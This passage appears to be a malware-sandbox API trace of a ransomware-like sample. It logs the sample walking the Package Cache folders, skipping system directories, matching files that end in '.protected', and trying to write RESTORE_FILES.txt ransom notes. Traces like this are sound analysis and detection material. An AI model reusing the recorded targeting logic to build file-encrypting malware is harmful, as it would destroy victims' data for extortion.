pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RESTORE_FILES.txt") returned 104 [0093.332] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.332] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.332] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.333] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.333] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RESTORE_FILES.txt") returned 104 [0093.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.334] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.334] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.334] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.334] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.334] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.334] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.334] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RESTORE_FILES.txt") returned 95 [0093.334] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.334] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.334] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.334] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.334] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RESTORE_FILES.txt") returned 95 [0093.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.335] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.335] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.335] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.335] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.335] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.335] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.335] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\RESTORE_FILES.txt") returned 54 [0093.335] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.335] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.335] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.335] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="Windows") returned -1 [0093.335] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="Program Files") returned -1 [0093.335] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="Program Files (x86)") returned -1 [0093.335] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="$Recycle.bin") returned 1 [0093.335] lstrcmpiW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="System Volume Information") returned -1 [0093.335] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 86 [0093.335] lstrcmpW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2=".") returned 1 [0093.335] lstrcmpW (lpString1="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="..") returned 1 [0093.335] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*") returned 88 [0093.335] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.335] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.335] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.335] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.335] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.335] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.335] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\.") returned 88 [0093.335] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.335] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.335] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.335] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.335] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.336] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.336] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.336] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\..") returned 89 [0093.336] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.336] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.336] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.336] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0093.336] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0093.336] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0093.336] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0093.336] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0093.336] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned 95 [0093.336] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.336] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.336] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*") returned 97 [0093.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.337] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.337] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.337] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.337] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.337] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.337] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\.") returned 97 [0093.337] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.337] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.337] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.337] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.337] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.337] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.337] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.337] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\..") returned 98 [0093.337] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.337] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.337] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.337] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.337] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.337] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.337] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.337] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.337] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 113 [0093.337] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.337] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.337] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.337] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Windows") returned -1 [0093.337] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files") returned 1 [0093.337] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files (x86)") returned 1 [0093.337] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="$Recycle.bin") returned 1 [0093.337] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="System Volume Information") returned 1 [0093.337] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned 116 [0093.337] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0093.337] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0093.337] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*") returned 118 [0093.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.338] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.338] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.338] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.338] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.338] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\.") returned 118 [0093.338] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.338] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.338] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.338] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.338] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.338] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.338] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\..") returned 119 [0093.338] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.338] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.338] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.338] lstrcmpiW (lpString1="cab1.cab.protected", lpString2="Windows") returned -1 [0093.338] lstrcmpiW (lpString1="cab1.cab.protected", lpString2="Program Files") returned -1 [0093.338] lstrcmpiW (lpString1="cab1.cab.protected", lpString2="Program Files (x86)") returned -1 [0093.338] lstrcmpiW (lpString1="cab1.cab.protected", lpString2="$Recycle.bin") returned 1 [0093.338] lstrcmpiW (lpString1="cab1.cab.protected", lpString2="System Volume Information") returned -1 [0093.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected") returned 135 [0093.338] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.338] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.338] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.338] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.338] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.338] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.338] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 134 [0093.338] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.338] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.338] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.338] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi.protected", lpString2="Windows") returned -1 [0093.338] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi.protected", lpString2="Program Files") returned 1 [0093.338] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi.protected", lpString2="Program Files (x86)") returned 1 [0093.338] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi.protected", lpString2="$Recycle.bin") returned 1 [0093.338] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi.protected", lpString2="System Volume Information") returned 1 [0093.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected") returned 152 [0093.338] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi.protected", lpSrch=".protected") returned=".protected" [0093.338] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.339] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.339] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 134 [0093.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.339] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.339] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.339] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 113 [0093.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.340] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.340] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.340] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.340] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.340] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.340] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.340] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RESTORE_FILES.txt") returned 104 [0093.340] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.340] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.340] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.340] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.340] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RESTORE_FILES.txt") returned 104 [0093.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.341] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.341] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="Windows") returned -1 [0093.341] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="Program Files") returned -1 [0093.341] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="Program Files (x86)") returned -1 [0093.341] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="$Recycle.bin") returned 1 [0093.341] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="System Volume Information") returned -1 [0093.341] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 75 [0093.341] lstrcmpW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2=".") returned 1 [0093.341] lstrcmpW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="..") returned 1 [0093.341] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*") returned 77 [0093.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.341] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.341] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.341] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.341] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.341] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.341] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\.") returned 77 [0093.341] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.341] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.341] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.341] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.341] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.341] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.341] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.341] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\..") returned 78 [0093.341] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.342] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.342] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.342] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.342] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.342] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.342] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.342] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.342] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\RESTORE_FILES.txt") returned 93 [0093.342] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.342] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.342] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.342] lstrcmpiW (lpString1="state.rsm.protected", lpString2="Windows") returned -1 [0093.342] lstrcmpiW (lpString1="state.rsm.protected", lpString2="Program Files") returned 1 [0093.342] lstrcmpiW (lpString1="state.rsm.protected", lpString2="Program Files (x86)") returned 1 [0093.342] lstrcmpiW (lpString1="state.rsm.protected", lpString2="$Recycle.bin") returned 1 [0093.342] lstrcmpiW (lpString1="state.rsm.protected", lpString2="System Volume Information") returned -1 [0093.342] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.protected") returned 95 [0093.342] StrStrIW (lpFirst="state.rsm.protected", lpSrch=".protected") returned=".protected" [0093.342] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.342] lstrcmpiW (lpString1="vcredist_x86.exe.protected", lpString2="Windows") returned -1 [0093.342] lstrcmpiW (lpString1="vcredist_x86.exe.protected", lpString2="Program Files") returned 1 [0093.342] lstrcmpiW (lpString1="vcredist_x86.exe.protected", lpString2="Program Files (x86)") returned 1 [0093.342] lstrcmpiW (lpString1="vcredist_x86.exe.protected", lpString2="$Recycle.bin") returned 1 [0093.342] lstrcmpiW (lpString1="vcredist_x86.exe.protected", lpString2="System Volume Information") returned 1 [0093.342] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 